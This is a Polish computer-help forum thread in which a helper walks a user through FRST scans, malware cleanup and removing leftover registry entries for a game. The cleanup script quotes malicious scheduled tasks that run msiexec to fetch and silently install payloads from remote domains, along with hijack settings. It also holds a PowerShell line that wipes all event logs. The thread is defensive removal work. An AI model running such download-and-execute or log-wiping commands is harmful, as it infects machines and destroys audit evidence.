Problem z GameUXInstallHelper_FF

[xxbartus]

Na wstępnie - jeśli zły dział to przepraszam i zmieńcie go na poprawny. Jest to mój pierwszy takowy post, więc również nie wiem co jest potrzebne do diagnozy. Piszcie co potrzebne do doślę  

 

Procek: Intel(R) Core(TM) i7-6700 CPU @ 3.40GHz   3.41 GHz

Karta Graficzna: NVIDIA GeForce GTX 1060 3GB

RAM: 8 GB

Win 10, 64bity

 

Cześć wszystkim. 
 

Posiadam taki problem, otóż chciałem ostatnio pograć w Stronghold Crusader Extreme i w instalacji pojawiło się, że mogę grać. Zdziwiłem się bo nie instalowałem jej w ostatnim dłuższym czasie. Ale spróbowałem.. Nacisnąłem graj.. i ukazało się, że nie może znaleźć pliku z grą. To stwierdziłem, że spróbuję ją przeinstalować. Wchodząc w panel sterowania>odinstaluj programy> Stronghold Crusader Extreme pojawił mi się taki o to problem:

 

Unhandled Exception

 

Error Number: 0x80040702

Description: Failed to load DLL: GameUXInstallHelper_FF

 

Setup will now terminate.

 

Następnie próbowałem naprawić to dołączeniem GameUXInstallHelper_FF  do SysWOW64 jak i do odpowiednika 32. Nic nie dało. Próbowałem w konsoli resetować ten plik. Sprawdzałem wszystko co napotykałem na polskich i zagranicznych forach jednak bezskutecznie. 

Chciałem usunąć samą pozostałość z rejestru po grze, która widnieje jako zainstalowana w 2018r. Jednak wyskakiwało, że nie można usunąć {8C3727F2-8E37-49E4-820C-03B1677F53B6}.

 

Po wielu próbach trafiłem na jakiś post zagraniczny, że ktoś wykorzystał CCleanera do tego. Mianowicie wykonał cały przegląd Registry, rozwiązania problemów napotkanych a później z poziomu CCleaner>Tools>Uninstall usunął tę grę i wszystko było po sprawie. Tak też wykonałem to i obecnie gra zniknęła mi z panelu sterowania>odinstaluj programy, rejestru, CCleanera, UninstallView. Problem również został bo dalej nie da się jej odinstalować. 

 

Brakuje mi pomysłów. Liczę na Was i Waszą pomoc! W razie jakiś braków piszcie! Pozdro  

 

[Twój_Anioł_Stróż]

Zrób logi z FRST >  http://www.forumpc.pl/topic/277786-nieingerencyjne-narzędzia-do-tworzenia-logów-systemowych/?p=2010191
przed skanem zaznacz: Additional.txt Shortcut.txt,

[xxbartus]

Cześć Mój Stróżu  Dziękuję za tak sprawną odpowiedź 

Poniżej załączam pliki o które prosiłeś. 

 

Czekam na kolejne kroki  

Addition.txt FRST.txt Shortcut.txt

[Twój_Anioł_Stróż]

Cytuj

odinstaluj programy> Stronghold Crusader Extreme

Czy to ten sam program:

Cytuj

Stronghold (HKLM-x32\...\{C917BA70-28A3-4C74-B163-41FD8C8E1A5A}) (Version: 1.20.0000 - Firefly Studios)

(nigdy nie korzystałem z takich gier, więc pytam)

 

-------------

Masz co najmniej kilka infekcji, więc:

Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

C:\Program Files (x86)\eQvvyMYx.exe
C:\WINDOWS\aEYOl.exe
C:\Program Files (x86)\iHEvcaGXYWUg.exe
C:\WINDOWS\SysWOW64\iOEAI.exe
HKU\S-1-5-21-2103383577-742474153-3939938881-1001\...\Winlogon: [Shell] %comspec% <==== UWAGA
HKU\S-1-5-21-2103383577-742474153-3939938881-1001\...\Command Processor: @mode 20,5 & tasklist /FI "IMAGENAME eq SoundMixer.exe" 2>NUL | find /I /N "SoundMixer.exe">NUL && exit & if exist ( start /MIN "" & tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit ) else ( tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit ) <==== UWAGA
Task: {71150430-F4EB-4F31-97FA-7400F8262B24} - System32\Tasks\{56959BF3-2978-45E7-8999-0D0C9BCA28B6} => "msiexec.exe" -ihttp://inthemel.info/kkofeqdsswfw.fbf -q -ihxxp://inthemel.info/kkofeqdsswfw.fbf -q (Brak pliku) <==== UWAGA
Task: {B0CE30B5-4C54-4165-8CF8-A155AB05C282} - System32\Tasks\{F1E0824A-DA43-D034-F25F-9D44EA59B507} => "msiexec.exe" -ihttp://inthemel.info/ttugw4y98ezl.uyv -q -ihxxp://inthemel.info/ttugw4y98ezl.uyv -q (Brak pliku) <==== UWAGA
Task: {B4CC682E-D160-45B6-ADA3-64926E2F6421} - System32\Tasks\{6D26B412-94A4-642E-00BD-D00174A74192} => "msiexec.exe" -ihttps://numbersionocego.info/nyimvvolnyvr.btb -q -ihxxps://numbersionocego.info/nyimvvolnyvr.btb -q (Brak pliku) <==== UWAGA
C:\Users\Admin\AppData\Roaming\Fazala.exe
C:\Users\Admin\AppData\Local\imw.ini
C:\Users\Admin\AppData\Local\VlzYU.exe
HKU\S-1-5-21-2103383577-742474153-3939938881-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.nav-pl.com/
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.globasearch.com/?serie=225&installkey=sZxTafLayCut8hKkFtcK&b=3&q={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.globasearch.com/?serie=225&installkey=sZxTafLayCut8hKkFtcK&b=3&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2103383577-742474153-3939938881-1001 -> DefaultScope {087B6495-B8CF-4677-907C-4ED6A2664202} URL = hxxp://www.nav-pl.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-2103383577-742474153-3939938881-1001 -> {087B6495-B8CF-4677-907C-4ED6A2664202} URL = hxxp://www.nav-pl.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-2103383577-742474153-3939938881-1001 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxps://mysearch.avg.com/search?cid={43F73963-F8FD-47C0-8421-7904DAEAF81B}&mid=08695619971447cf880b9d852ca31703-0a63f5c5a8de04831c95de8baea861ccd05a28ed&lang=pl&ds=AVG&coid=avgtbavg&cmpid=0217tb&pr=fr&d=2016-11-02 15:08:41&v=4.3.9.626&pid=wtu&sg=&sap=dsp&q={searchTerms}
BHO: Brak nazwy -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> Brak pliku
HKLM\...\StartupApproved\StartupFolder: => "McAfee Security Scan Plus.lnk"
FirewallRules: [{681186E8-95B2-4E56-B6F4-F513AC2EED44}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{9C92CFB9-94B6-4116-914A-0D5041511178}] => (Allow) C:\WINDOWS\SysWOW64\iOEAI.exe (Microsoft Corporation) [Brak podpisu cyfrowego]
FirewallRules: [{82786022-B638-47DF-8E46-51C523547544}] => (Allow) C:\Program Files (x86)\iHEvcaGXYWUg.exe (Microsoft Corporation) [Brak podpisu cyfrowego]
FirewallRules: [{0134C004-A700-4108-9512-207816E3A0CF}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{571AFC1A-F15B-45B5-9B78-056C9BF8CE2F}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{ACA9D774-75C5-409E-8D6B-C9D1E818ABE3}] => (Allow) C:\WINDOWS\aEYOl.exe (Microsoft Corporation) [Brak podpisu cyfrowego]
FirewallRules: [{D08DC155-2CEB-4992-90B7-CCAF2C1D23D9}] => (Allow) C:\Program Files (x86)\eQvvyMYx.exe (Microsoft Corporation) [Brak podpisu cyfrowego]
FirewallRules: [{A9E85927-70C9-4A18-85B8-A715E93035EE}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation)
HKLM-x32\...\Run: [] => [X]
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== UWAGA
GroupPolicy: Ograniczenia ? <==== UWAGA
Policies: C:\ProgramData\NTUSER.pol: Ograniczenia <==== UWAGA
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Ograniczenia <==== UWAGA
HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
Task: {18515B39-5491-44F2-9C27-CE2B12BEF8D7} - System32\Tasks\Antivirus Emergency Update => C:\Program Files (x86)\AVG\Antivirus\AvEmUpdate.exe (Brak pliku)
Task: {232E6A1B-06D3-4828-B6BD-F994C5C85A5E} - System32\Tasks\{7FDE55F9-7314-2DA8-DAC7-96C085FE5385} => "msiexec.exe" -ihttps://numbersionocego.info/623bf9xs8att.vfv -q -ihxxps://numbersionocego.info/623bf9xs8att.vfv -q (Brak pliku) <==== UWAGA
Task: {317EBDA3-D0F8-4F0D-AC99-A305F84AA60E} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs (Brak pliku)
Task: {32BB8223-AE8B-4010-91AE-C722A3BEE2E7} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA
Task: {B594BCF0-5C01-4B17-AAD3-9A93090C8FD2} - System32\Tasks\AVGUpdateTaskMachineCore => C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe /c (Brak pliku)
Task: {C5353E2C-806E-46BA-94D8-FFD9CE6C94CA} - System32\Tasks\Chess Titans => C:\Users\Admin\AppData\Local\Temp\is-283JE.tmp\prsetup.exe "/logon" (Brak pliku) <==== UWAGA
Edge HomePage: Default -> hxxp://www.nav-pl.com/
Edge StartupUrls: Default -> "hxxp://www.nav-pl.com/"
Edge DefaultSearchURL: Default -> hxxp://www.nav-pl.com/search?q={searchTerms}
Edge DefaultSearchKeyword: Default -> nav-pl.com
CHR Session Restore: Profile 1 -> [funkcja włączona]
S3 dg_ssudbus; \SystemRoot\system32\DRIVERS\ssudbus2.sys [X]
S3 huawei_enumerator; \SystemRoot\System32\drivers\ew_jubusenum.sys [X]
S1 SaferVPNNetfilter2; system32\drivers\SaferVPNNetfilter2.sys [X]
C:\Users\Admin\AppData\Local\Tempzxpsigne052820d6935a1ef
C:\Users\Admin\AppData\Local\Tempzxpsign9b8815f17630e9d8
C:\Users\Admin\AppData\Local\Tempzxpsigna1a50f37a182c538
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

 

---------------

Uruchom FRST.
W polu SEARCH (SZUKAJ) wklej:

Cytuj

GameUXInstallHelper_FF; {8C3727F2-8E37-49E4-820C-03B1677F53B6};

kliknij na przycisk "Search Registry" (Szukaj w Rejestrze).
Raport z tego będzie tam, gdzie jest FRST.

 

[xxbartus]

Cytuj

Godzinę temu, Twój_Anioł_Stróż napisał:

Cytuj

odinstaluj programy> Stronghold Crusader Extreme

Czy to ten sam program:

Cytuj

Stronghold (HKLM-x32\...\{C917BA70-28A3-4C74-B163-41FD8C8E1A5A}) (Version: 1.20.0000 - Firefly Studios)

(nigdy nie korzystałem z takich gier, więc pytam)

 

To są dwie różne gry. Jest Stronghold (zainstalowana i wszystko ok) i jest ta gra/y o która chodzi czyli Stronghold Crusader i/lub Stronghold Crusader Extreme. 

 

Niestety nie ukrywam, że komputer to dziko używałem i pobierałem nieraz jak leci dlatego zapewne są infekcje. 

Wykonałem to jak kazałeś - na pierwszy rzut oka naprawiłeś włączanie kompa bo miałem czarny ekran zawsze i musiałem wchodzić crtl+alt+del>menedzer zadan>uruchom nowe zadanie>explorer.exe a teraz juz nie więc no  

Poniżej standardowo załączam plik z Searcha. 

Raport.txt

[Twój_Anioł_Stróż]

Wyszukiwanie nic nie znalazło w Rejestrze. Nie wiem więc, czego jeszcze mam szukać?

 

Uruchom FRST.
W polu SEARCH (SZUKAJ) wklej:

Cytuj

Crusader

kliknij na przycisk "Search Registry" (Szukaj w Rejestrze).
Raport z tego będzie tam, gdzie jest FRST.

[xxbartus]

Przy próbie odpalenia jest taki komunikat + dalej pokazuje jako zainstalowaną grę... :? 

 

Raport z Crusader'a

 

 

Rap_crus.txt

[Twój_Anioł_Stróż]

Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

StartRegedit:
Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\GameUX\Games\{40A855C5-403C-42A8-BEF5-65AC9CE86C83}]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\GameUX\Games\{583874E7-77F8-44F8-B019-C76A06B8E55F}]

[-HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Firefly Studios\Stronghold Crusader Extreme]

[-HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\DirectPlay\Applications\Stronghold Crusader]

[-HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\DirectPlay\Applications\Stronghold Crusader Extreme]

[-HKEY_USERS\S-1-5-21-2103383577-742474153-3939938881-1001\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\21972c0e_0]

[-HKEY_USERS\S-1-5-21-2103383577-742474153-3939938881-1001\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\a5d65e06_0]

[-HKEY_USERS\S-1-5-21-2103383577-742474153-3939938881-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A247772F-1BD8-489C-B8F6-9AB2F81EF55D}]

[-HKEY_USERS\S-1-5-21-2103383577-742474153-3939938881-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{F4863CF7-F8D5-41F2-891D-CE6395F0619F}]

[-HKEY_USERS\S-1-5-21-2103383577-742474153-3939938881-1001\System\GameConfigStore\Children\5096f489-68c6-4b46-9cad-9ab86017a00c]

EndRegedit:

Reboot:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

.

Napisz, czy to coś pomogło?

.

[xxbartus]

Nie wiem jak mam Ci dziękować ale naprawiłeś to! Sam się głowiłem szukałem sposobów, które nie pomagały. A jednak nie jestem na tyle obeznany systemie aby potrafić tak się posługiwać nim. Dziękuję za wszelką pomoc! Czy ja w podziękowaniu mogę jakoś tutaj dać Ci jakąś odznakę, plus.. cokolwiek?  

[Twój_Anioł_Stróż]

Cytuj

jakoś tutaj dać Ci jakąś odznakę, plus.. cokolwiek?

chyba jest coś takiego.

w moich postach na dole po prawej są pewne znaczki - wystarczy wybrać jeden z nich (najlepiej "dobra wypowiedź"). Przynajmniej tak mi zdaje.